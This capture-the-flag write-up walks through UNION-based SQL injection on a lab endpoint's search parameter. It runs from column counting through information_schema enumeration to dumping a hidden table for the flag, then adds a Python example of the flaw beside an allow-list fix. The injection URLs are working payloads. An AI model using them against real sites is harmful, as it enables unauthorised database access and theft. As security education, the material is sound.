Click an entry on the left side of the webpage while Burp Suite (bp) captures the traffic, and you can see the query request. Testing the column count with ORDER BY:
/query?search=arabia_terra/**/ORDER/**/BY/**/2
The initial judgment is that the column count is 2. When modifying the URL in Burp, it is best to encode spaces as %20 or replace them with /**/. The next statement then shows that the current database is aliens:
/query?search=arabia_terra%20union%20select%201,database()
/query?search=arabia_terra%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()
This dumps the tables of the current database: amazonis_planitia, arabia_terra, chryse_planitia, hellas_basin, hesperia_planum, noachis_terra, olympus_mons, tharsis_rise, utopia_basin.
These are the entries in the directory on the page, so they seem useless.
/query?search=arabia_terra%20union%20select%201,group_concat(schema_name)%20from%20information_schema.schemata
This returns three databases: information_schema, alien_code and aliens. The most likely one is alien_code.
/query?search=arabia_terra%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema="alien_code"
There is only one table: code
/query?search=arabia_terra%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name="code"
Two fields: id, code
/query?search=arabia_terra%20union%20select%201,group_concat(id,code)%20from%20alien_code.code
This returns the flag.
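
The requests above work because the search value ends up inside the SQL text itself. The following is an added example (not part of the original write-up and not the challenge's code) showing that flaw beside a fix. It assumes the endpoint builds SELECT * FROM <search>; SQLite stands in for the challenge's database, and the function names, sample rows and secret value are constructed.

```python
import sqlite3

# Table names the page lists for the aliens database, used here as the allow-list.
ALLOWED_TABLES = frozenset({
    "amazonis_planitia", "arabia_terra", "chryse_planitia", "hellas_basin",
    "hesperia_planum", "noachis_terra", "olympus_mons", "tharsis_rise",
    "utopia_basin",
})

def make_db():
    """Constructed stand-in: in-memory SQLite instead of the challenge's database."""
    db = sqlite3.connect(":memory:")
    db.execute("ATTACH DATABASE ':memory:' AS alien_code")
    db.execute("CREATE TABLE arabia_terra (id INTEGER, description TEXT)")
    db.execute("INSERT INTO arabia_terra VALUES (1, 'constructed sample row')")
    db.execute("CREATE TABLE alien_code.code (id INTEGER, code TEXT)")
    db.execute("INSERT INTO alien_code.code VALUES (1, 'CONSTRUCTED_SECRET')")
    return db

def query_vulnerable(db, search):
    # Assumed shape of the flaw: the parameter is pasted into the statement.
    return db.execute("SELECT * FROM " + search).fetchall()

def query_hardened(db, search):
    # Identifiers cannot be bound as parameters, so the input is only used
    # to pick a fixed, known table name; anything else is rejected.
    if search not in ALLOWED_TABLES:
        raise ValueError("unknown region")
    return db.execute(f'SELECT * FROM "{search}"').fetchall()

# Constructed input shaped like the page's last request, adapted to SQLite.
INJECTED = "arabia_terra union select 1,group_concat(code) from alien_code.code"

if __name__ == "__main__":
    db = make_db()
    print(query_vulnerable(db, INJECTED))      # rows from the second table leak
    print(query_hardened(db, "arabia_terra"))  # normal lookup still works
    try:
        query_hardened(db, INJECTED)
    except ValueError as exc:
        print("rejected:", exc)
```

Running the application's database account with access to the aliens schema only would additionally keep alien_code out of reach even if an injection point remained.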